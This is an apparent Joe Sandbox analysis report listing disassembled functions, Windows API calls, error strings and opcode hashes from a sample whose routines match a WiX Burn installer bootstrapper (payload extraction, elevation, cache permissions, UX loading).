                                                                                                                                                              • Opcode ID: 399ba9971f93ea2b25f6850609b60f134c7b571c1f9b430ce85fe6092288b348
                                                                                                                                                              • Instruction ID: 14ec4f9fe35a4f339fcfda79d30dbfd263ab166e30fa0cf83406232e736c0de3
                                                                                                                                                              • Opcode Fuzzy Hash: 399ba9971f93ea2b25f6850609b60f134c7b571c1f9b430ce85fe6092288b348
                                                                                                                                                              • Instruction Fuzzy Hash: B3715C71D01619ABCF169FA8DC45AEEBBB9FF08310F14012AE911F7350E779AD418B62
                                                                                                                                                              Function 007C3076 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 210COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 007C30C1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C30C7
                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 007C3121
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3127
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C31DB
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C31E5
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C323B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3245
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                              • String ID: pathutil.cpp
                                                                                                                                                              • API String ID: 1547313835-741606033
                                                                                                                                                              • Opcode ID: d1acf457be0f46d8302ac42b591b953efb0742f241a38e4a79a88ba91c79dfae
                                                                                                                                                              • Instruction ID: 96fa44a90b9dfef0294cb569d5e42dca40dbb769414793581e6cf1157524cb38
                                                                                                                                                              • Opcode Fuzzy Hash: d1acf457be0f46d8302ac42b591b953efb0742f241a38e4a79a88ba91c79dfae
                                                                                                                                                              • Instruction Fuzzy Hash: 8861A273D00629ABDF219AE48C45F9EBBA5BB04760F15816DEE11BB250E739DF0097D0
                                                                                                                                                              Function 007C2DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 007C2E5F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C2E69
                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F09
                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 007C2F96
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C2FA3
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 007C2FB7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007C301F
                                                                                                                                                              Strings
                                                                                                                                                              • pathutil.cpp, xrefs: 007C2E8D
                                                                                                                                                              • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 007C2F66
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                              • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                              • API String ID: 3480017824-1101990113
                                                                                                                                                              • Opcode ID: 4da1590015badff3948d234366ceae4caa835007f5fcb825835961d8d74bc964
                                                                                                                                                              • Instruction ID: 380b469962995feea7d1decb61bb247e3c850e89b50a8fce62c0cec217ea2ce6
                                                                                                                                                              • Opcode Fuzzy Hash: 4da1590015badff3948d234366ceae4caa835007f5fcb825835961d8d74bc964
                                                                                                                                                              • Instruction Fuzzy Hash: FD716372D01129ABDB709F94DC49FAAB3B9AB08710F1041ADF914E7291D7389E81CFA0
                                                                                                                                                              Function 007CCBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,007C53BD,00000000,007C5489,007C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 007CCC1C
                                                                                                                                                              Strings
                                                                                                                                                              • Payload was not found in container: %ls, xrefs: 007CCD29
                                                                                                                                                              • Failed to get next stream., xrefs: 007CCD03
                                                                                                                                                              • Failed to concat file paths., xrefs: 007CCCFC
                                                                                                                                                              • Failed to extract file., xrefs: 007CCCE7
                                                                                                                                                              • Failed to find embedded payload: %ls, xrefs: 007CCC48
                                                                                                                                                              • payload.cpp, xrefs: 007CCD1D
                                                                                                                                                              • Failed to get directory portion of local file path, xrefs: 007CCCF5
                                                                                                                                                              • Failed to ensure directory exists, xrefs: 007CCCEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                              • API String ID: 1825529933-1711239286
                                                                                                                                                              • Opcode ID: 48acc254e0298ed2a2242d5c4f08883cf71a6062e95b6fcf3be4159ce13dbaf4
                                                                                                                                                              • Instruction ID: 514ca34721da5cce77080ab955002c465083db1dcc48e0f3e51dd0bbf89b177b
                                                                                                                                                              • Opcode Fuzzy Hash: 48acc254e0298ed2a2242d5c4f08883cf71a6062e95b6fcf3be4159ce13dbaf4
                                                                                                                                                              • Instruction Fuzzy Hash: D141B231A00615EBCF369F48CC85F6EBB75FF00720B14816DE919AB292D7789D40DBA0
                                                                                                                                                              Function 007C4796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 007C47BB
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007C47C1
                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C484F
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to load UX., xrefs: 007C4804
                                                                                                                                                              • engine.cpp, xrefs: 007C489B
                                                                                                                                                              • Failed to start bootstrapper application., xrefs: 007C481D
                                                                                                                                                              • wininet.dll, xrefs: 007C47EE
                                                                                                                                                              • Unexpected return value from message pump., xrefs: 007C48A5
                                                                                                                                                              • Failed to create engine for UX., xrefs: 007C47DB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CurrentPeekThread
                                                                                                                                                              • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                              • API String ID: 673430819-2573580774
                                                                                                                                                              • Opcode ID: 1ed85c544892de04ae48191323740e4cd0b5e6dd6ee14bbaf8e04c752488f210
                                                                                                                                                              • Instruction ID: 5af4aa620128a5cfe8c5189c4a92e5c545a976c536a3a7a69647b2bc57c63c59
                                                                                                                                                              • Opcode Fuzzy Hash: 1ed85c544892de04ae48191323740e4cd0b5e6dd6ee14bbaf8e04c752488f210
                                                                                                                                                              • Instruction Fuzzy Hash: 9A41BF71A00655EFEB609BA4CC99FBAB7ACFF04314F10012DF905E7280DB29AD0087A0
                                                                                                                                                              Function 007E9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000), ref: 007E9D0F
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9D19
                                                                                                                                                              • CopyFileExW.KERNEL32(00000000,00000000,007E9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 007E9D67
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,007EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 007E9D96
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                              • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                              • API String ID: 1969131206-836986073
                                                                                                                                                              • Opcode ID: c4840d8de3c5431df4541c5daa843afe536a4f2d1f9be07831ce87e5a6d66cfc
                                                                                                                                                              • Instruction ID: 631c0ffde08a73861009f137135affe84d8a56f1bdaa7fe75b8ffd4a9180e747
                                                                                                                                                              • Opcode Fuzzy Hash: c4840d8de3c5431df4541c5daa843afe536a4f2d1f9be07831ce87e5a6d66cfc
                                                                                                                                                              • Instruction Fuzzy Hash: 3A31E873B42665F7DB209A678C45EAB776CFF49B20B144118BE14EB351E629CD00C6F1
                                                                                                                                                              Function 007D8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 007D9007
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to secure cache path: %ls, xrefs: 007D8FEA
                                                                                                                                                              • Failed to create ACL to secure cache path: %ls, xrefs: 007D8FBB
                                                                                                                                                              • Failed to allocate access for Users group to path: %ls, xrefs: 007D8F72
                                                                                                                                                              • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 007D8F30
                                                                                                                                                              • cache.cpp, xrefs: 007D8FB0
                                                                                                                                                              • Failed to allocate access for Everyone group to path: %ls, xrefs: 007D8F51
                                                                                                                                                              • Failed to allocate access for Administrators group to path: %ls, xrefs: 007D8F0F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLocal
                                                                                                                                                              • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                                                              • API String ID: 2826327444-4113288589
                                                                                                                                                              • Opcode ID: c7470d39a13a89ccb761a2839d65c74494ff0cfb0f739e378f4feb0b638a97da
                                                                                                                                                              • Instruction ID: d5bc26ff269af7fef548700ff54268f8839de9a437b6ceb4968d2ccd8c0d2619
                                                                                                                                                              • Opcode Fuzzy Hash: c7470d39a13a89ccb761a2839d65c74494ff0cfb0f739e378f4feb0b638a97da
                                                                                                                                                              • Instruction Fuzzy Hash: 3541F632A40725F7DB6157508C06FAA767DEF50B10F1141A6FA08FA380EF799E4497E2
                                                                                                                                                              Function 007D492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 007D495A
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D4967
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 007D4A12
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D4A1C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                              • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                              • API String ID: 1948546556-773887359
                                                                                                                                                              • Opcode ID: 217fd91133cc782a7ee580edaedfa980d8fcbe5abc0afc00076ae9d991a4358a
                                                                                                                                                              • Instruction ID: fffc2ae16b4cbb16c8c96d35ff17f12f2afc4b716f45ef868b6aa9449f850ee3
                                                                                                                                                              • Opcode Fuzzy Hash: 217fd91133cc782a7ee580edaedfa980d8fcbe5abc0afc00076ae9d991a4358a
                                                                                                                                                              • Instruction Fuzzy Hash: FF31A832980229BBDB209BA5CC45BABB778FF04721F11C13AFD54E6340D778AD408AD4
                                                                                                                                                              Function 00806C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 00806C88
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00806CA5
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806CE3
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806D27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$CompareFree
                                                                                                                                                              • String ID: `<u$email$name$uri
                                                                                                                                                              • API String ID: 3589242889-1197142144
                                                                                                                                                              • Opcode ID: 7a5b466190a4cdf40da12ad2dfd78c46af31a22f8efd71d76dd9cca8932f6608
                                                                                                                                                              • Instruction ID: 0e237a5996043cefe6ed5d865e47d0c3ebbeb0ff760c3dac48d70181ef72c9fd
                                                                                                                                                              • Opcode Fuzzy Hash: 7a5b466190a4cdf40da12ad2dfd78c46af31a22f8efd71d76dd9cca8932f6608
                                                                                                                                                              • Instruction Fuzzy Hash: F0417E31A01219FBDB619B94CD45FADBB78FF04721F2042A4E920EB2E0E7319E60DB50
                                                                                                                                                              Function 007DE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadBitmapW.USER32(?,00000001), ref: 007DE2E5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE2F1
                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 007DE338
                                                                                                                                                              • GetCursorPos.USER32(?), ref: 007DE359
                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 007DE36B
                                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 007DE381
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                              • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                              • API String ID: 2342928100-598475503
                                                                                                                                                              • Opcode ID: 43b191742c45bb9fd078a8b2ce039d5bf1a3d8dbc85a6139688982663f9067a6
                                                                                                                                                              • Instruction ID: 68713c966d5f029974e9b7df09f4c95ef49082330fda0c36f0cf46c9118b2fbd
                                                                                                                                                              • Opcode Fuzzy Hash: 43b191742c45bb9fd078a8b2ce039d5bf1a3d8dbc85a6139688982663f9067a6
                                                                                                                                                              • Instruction Fuzzy Hash: DA315271A00219AFDB55DFA8D949A9EBBF4FF08710F158119F904EB381DB74E900CBA0
                                                                                                                                                              Function 007D50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0080B500), ref: 007D50D3
                                                                                                                                                              • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 007D5171
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007D518A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseCurrentHandle
                                                                                                                                                              • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                              • API String ID: 2815245435-1352204306
                                                                                                                                                              • Opcode ID: f2bd58d44e6c932033987f5414fb565fb269ad9a05888aff293a0f1d7512566c
                                                                                                                                                              • Instruction ID: f7aab7fdbc80c03acbb6e42342a214c0924e37c805010f68af546ed5d9da708a
                                                                                                                                                              • Opcode Fuzzy Hash: f2bd58d44e6c932033987f5414fb565fb269ad9a05888aff293a0f1d7512566c
                                                                                                                                                              • Instruction Fuzzy Hash: 842168B190160DFFCF119F94CC42AAEBB78FF04350B50816AF821E2311D7369E509B91
                                                                                                                                                              Function 007C6882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 007C68AC
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007C68B3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C68BD
                                                                                                                                                              Strings
                                                                                                                                                              • msi, xrefs: 007C68A3
                                                                                                                                                              • Failed to find DllGetVersion entry point in msi.dll., xrefs: 007C68EB
                                                                                                                                                              • DllGetVersion, xrefs: 007C689E
                                                                                                                                                              • Failed to get msi.dll version info., xrefs: 007C6905
                                                                                                                                                              • variable.cpp, xrefs: 007C68E1
                                                                                                                                                              • Failed to set variant value., xrefs: 007C6929
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                              • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                              • API String ID: 4275029093-842451892
                                                                                                                                                              • Opcode ID: 2a07421b1e5a9c81d58f8d0d28c312af4c552256321bb86212f144536cec4e40
                                                                                                                                                              • Instruction ID: 62df5f481768a37965ba16bd9ee55ec2b565fc025ccc912d615d5b7f6f04386e
                                                                                                                                                              • Opcode Fuzzy Hash: 2a07421b1e5a9c81d58f8d0d28c312af4c552256321bb86212f144536cec4e40
                                                                                                                                                              • Instruction Fuzzy Hash: 0911B772A41739B6D7616BA98C86F7F7794EB04720F01052DFE11F6281D6789C0082E1
                                                                                                                                                              Function 007CD6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?), ref: 007CD6DA
                                                                                                                                                              • GetLastError.KERNEL32(?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?,?), ref: 007CD6E7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 007CD71F
                                                                                                                                                              • GetLastError.KERNEL32(?,007C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,007C548E,?,?), ref: 007CD72B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                              • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                              • API String ID: 1866314245-2276003667
                                                                                                                                                              • Opcode ID: 853540654d33861acf6f47e66ed689b1ba198ece959cd1a871456f282a14ac17
                                                                                                                                                              • Instruction ID: 0d786ed99870d15d470ac09f706a6e4d3c5eb1dc68525903335e7e803434d87b
                                                                                                                                                              • Opcode Fuzzy Hash: 853540654d33861acf6f47e66ed689b1ba198ece959cd1a871456f282a14ac17
                                                                                                                                                              • Instruction Fuzzy Hash: B3118277A80B32A7D73256955C09F5B6B94BB05B61F02853DBE64EB6C1EF28DC0086D0
